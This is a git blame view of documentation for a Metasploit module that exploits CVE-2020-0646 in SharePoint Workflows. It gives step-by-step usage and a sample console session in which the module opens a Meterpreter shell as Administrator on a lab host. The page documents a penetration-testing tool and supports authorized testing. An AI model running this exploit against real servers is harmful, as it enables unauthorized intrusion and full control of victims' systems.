adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

78 lines
3.1 KiB
Markdown
Raw Normal View History

Finish up the CVE-2020-0646 SharePoint RCE
2020-03-23 18:14:28 -04:00
## Vulnerable Application
Use the correct its instead of it's
2020-03-24 16:44:18 -04:00
This module exploits a vulnerability within SharePoint and its .NET backend
Finish up the CVE-2020-0646 SharePoint RCE
2020-03-23 18:14:28 -04:00
that allows an attacker to execute commands using specially crafted XOML data
sent to SharePoint via the Workflows functionality.
## Verification Steps
1. Install the application
1. Start msfconsole
1. Do: `use exploit/windows/http/sharepoint_workflows_xoml`
1. Set the target options (`RHOSTS`, `RPORT` and `SSL`) as appropriate
1. Set the authentication options (`DOMAIN`, `USERNAME` and `PASSWORD`) as appropriate
1. Do: `run`
1. You should get a shell
Cleanup module doc and comments for CVE-2020-0646
2020-03-24 10:15:58 -04:00
## Scenarios
Finish up the CVE-2020-0646 SharePoint RCE
2020-03-23 18:14:28 -04:00
Cleanup module doc and comments for CVE-2020-0646
2020-03-24 10:15:58 -04:00
### SharePoint 2019 on Server 2016
Finish up the CVE-2020-0646 SharePoint RCE
2020-03-23 18:14:28 -04:00
```
msf5 exploit(windows/http/sharepoint_workflows_xoml) > show options
Module options (exploit/windows/http/sharepoint_workflows_xoml):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKGROUP yes The domain to use for Windows authentication
PASSWORD Password1 yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.159.14 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The base path to the SharePoint application
URIPATH no The URI to use for this exploit (default is random)
USERNAME administrator yes Username to authenticate as
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.159.14 no The target address
Exploit target:
Id Name
-- ----
2 Windows Powershell
msf5 exploit(windows/http/sharepoint_workflows_xoml) > exploit
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Started bind TCP handler against 192.168.159.14:4444
[*] Sending stage (206403 bytes) to 192.168.159.14
[*] Meterpreter session 3 opened (0.0.0.0:0 -> 192.168.159.14:4444) at 2020-03-23 18:11:44 -0400
meterpreter > sysinfo
Computer : SHRPNT2019-P
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : SHRPNT2019P
Logged On Users : 14
Meterpreter : x64/windows
meterpreter > getuid
Server username: SHRPNT2019P\Administrator
meterpreter >
```
Reference in New Issue Copy Permalink